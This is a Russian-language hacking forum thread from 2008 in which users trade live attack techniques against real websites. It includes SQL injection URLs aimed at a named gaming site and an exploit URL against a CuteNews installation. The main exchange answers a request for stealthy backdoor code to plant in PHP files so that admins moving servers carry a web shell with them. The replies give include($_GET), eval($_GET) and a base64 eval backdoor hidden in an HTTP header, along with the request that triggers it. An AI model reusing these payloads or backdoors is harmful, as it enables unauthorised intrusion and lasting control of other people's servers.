Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.11.2008, 13:44
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
http://ava4me.ru/ Кто знает чтоза скрипт и где его взять?
|
|
|
11.11.2008, 14:26
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от xcedz
http://www.gamingtrend.com/PressReleases/index.php?PRID=-1%20union%20select%201,2,version(),4,5,6,7
дальше разберешься?
ЗЫ и вообще его уже захенкали http://forum.antichat.ru/showpost.php?p=594289&postcount=4856 (чет я сразу то не глянул  )
Ты по ссылке вапше ходил?
Там вапшет 32таблицы!
Я шяс с моба...буду за компом,запостю правильную линку...
|
|
|
|
11.11.2008, 18:16
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Здравствуйте! )) 
есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов.
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
Спасибо! |
|
|
|
11.11.2008, 18:25
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от tbody
Здраствуйте!
у меня вопрос
http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+6--
выдает страничку,
а http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+7--
ошибку.
Но запрос вида http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+union+select+1,2,3,4,5,6-- не работает.
Объясните чайнику вероятно в скрипте несколько sql-запросов с разным числом столбцов..а может еще что-то
а вот здесь все просто
Код:
http://www.gamingtrend.com/Reviews/review/review.php?ReviewID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
|
|
|
|
11.11.2008, 18:50
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от fervex
Здравствуйте! ))
есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов.
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
Спасибо! или
Код:
include($_GET['s']);
а потом
site.ru/test.php?d=ls
site.ru/test.php?s=http://www.google.com/shell.txt
|
|
|
|
11.11.2008, 18:54
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Сообщение от DimOnOID
или
Код:
include($_GET['s']);
а потом
site.ru/test.php?d=ls
site.ru/test.php?s=http://www.google.com/shell.txt спасибо!
они могут не-локальный include отключить
и отключить system
есть ещё варианты?
|
|
|
|
11.11.2008, 19:00
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
они могут не-локальный include отключить
и отключить system
тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
|
|
|
|
11.11.2008, 19:03
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
не работает сплоит, есть мыди почему?
cutenews 1.1.1 (strawbery)
http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
может на сервере отключен register_globals? попробуй так:
http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${phpinfo()}}--%3E
|
|
|
|
11.11.2008, 19:10
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от [Raz0r]
http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
да ..а есчё можно как у сплойта от СМФ
Код:
if(isset($_SERVER['HTTP_SHELL'])) { print otake;eval(base64_decode($_SERVER['HTTP_SHELL']));print otake;exit(); }
а патом пасылать
PHP код:
GET http://site.ru/index.php HTTP/1.0
Host: www.site.ru
Prama: no-cache
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*
Shell: c3lzdGVtKCdscycpOw==
Например так...
Последний раз редактировалось DimOnOID; 11.11.2008 в 20:43..
|
|
|
|
11.11.2008, 19:47
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от -m0rgan-
Ты по ссылке вапше ходил?
Там вапшет 32таблицы!
Я шяс с моба...буду за компом,запостю правильную линку...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
